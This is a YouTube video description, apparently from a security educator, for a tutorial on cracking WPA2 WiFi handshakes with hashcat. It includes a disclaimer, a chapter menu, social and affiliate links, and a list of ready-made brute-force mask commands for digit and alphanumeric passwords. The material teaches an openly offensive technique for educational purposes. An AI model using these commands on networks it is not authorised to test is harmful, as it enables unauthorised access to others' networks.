16 secs to break it! 😱 70% of real world WiFi networks owned!



16 secs to break it! 😱 70% of real world WiFi networks owned!

16 secs to break it! 😱 70% of real world WiFi networks owned!

Big thanks to Cisco Meraki for sponsoring this video! Learn how to secure hybrid networks so you can stop these kinds of attacks: https://davidbombal.wiki/meraki

Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites. Only use the tools demonstrated in this video on networks you have permission to attack.

// MENU //
00:00 ▶️ Intro
02:17 ▶️ Real word example
02:58 ▶️ Hashcat file format
03:28 ▶️ Handshake capture (old mode) 10 digits
03:57 ▶️ GPU setup
04:12 ▶️ Handshake capture (old mode) 10 digits (cont’d)
06:21 ▶️ Handshake capture (new mode) 8 digits
07:57 ▶️ Handshake capture (old mode) 8 digits
09:07 ▶️ Incrementing digits
11:55 ▶️ Built-in charsets
12:22 ▶️ Cracking alphanumerical passwords
18:42 ▶️ Using wordlists
19:00 ▶️ Conclusion

// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: https://youtu.be/Usw0IlGbkC4
Kali Wifi Adapters: https://youtu.be/5MOsY3VNLK8
Old method using airmon-ng: https://youtu.be/WfYxrLaqlN8
Old method using GPUs: https://youtu.be/J8A8rKFZW-M

// COMMANDS //
Check GPU:
hashcat.exe -I

10 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx ?d?d?d?d?d?d?d?d?d?d

Increment WPA2 digits (Old Method):
hashcat.exe -m 2500 -a 3 10digit.hccapx –increment –increment-min 8 –increment-max 20 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

8 digits (New Method):
hashcat.exe -m 22000 8-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d

10 digits (New Method):
hashcat.exe -m 22000 10-digit-wpa2.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

10 digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 ?1?1?1?1?1?1?1?1?1?1

Increment digits (New Method):
hashcat.exe -m 22000 hash.hc22000 -a 3 –increment –increment-min 8 –increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

Increment digits and alpha (New Method):
hashcat.exe -m 22000 10-digit-letters-wpa2.hc22000 -1 ?d?l?u -a 3 –increment –increment-min 8 –increment-max 12 ?1?1?1?1?1?1?1?1?1?1?1?1

// Previous Videos //
WiFi WPA/WPA2 vs hashcat and hcxdumptool: https://youtu.be/Usw0IlGbkC4
Kali Wifi Adapters: https://youtu.be/5MOsY3VNLK8
Old method using airmon-ng: https://youtu.be/WfYxrLaqlN8
Old method using GPUs: https://youtu.be/J8A8rKFZW-M

// SOCIAL //
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal

// MY STUFF //
Monitor: https://amzn.to/3yyF74Y
More stuff: https://www.amazon.com/shop/davidbombal

// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: [email protected]

wifi
gpu
kali linux
kali wifi
kali
alfa
alfa network
alfa network adapter
wifi password
wpa
wpa2
hashcat
linux

Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!

#wifi #wpa2 #hashcat .

Comments are closed.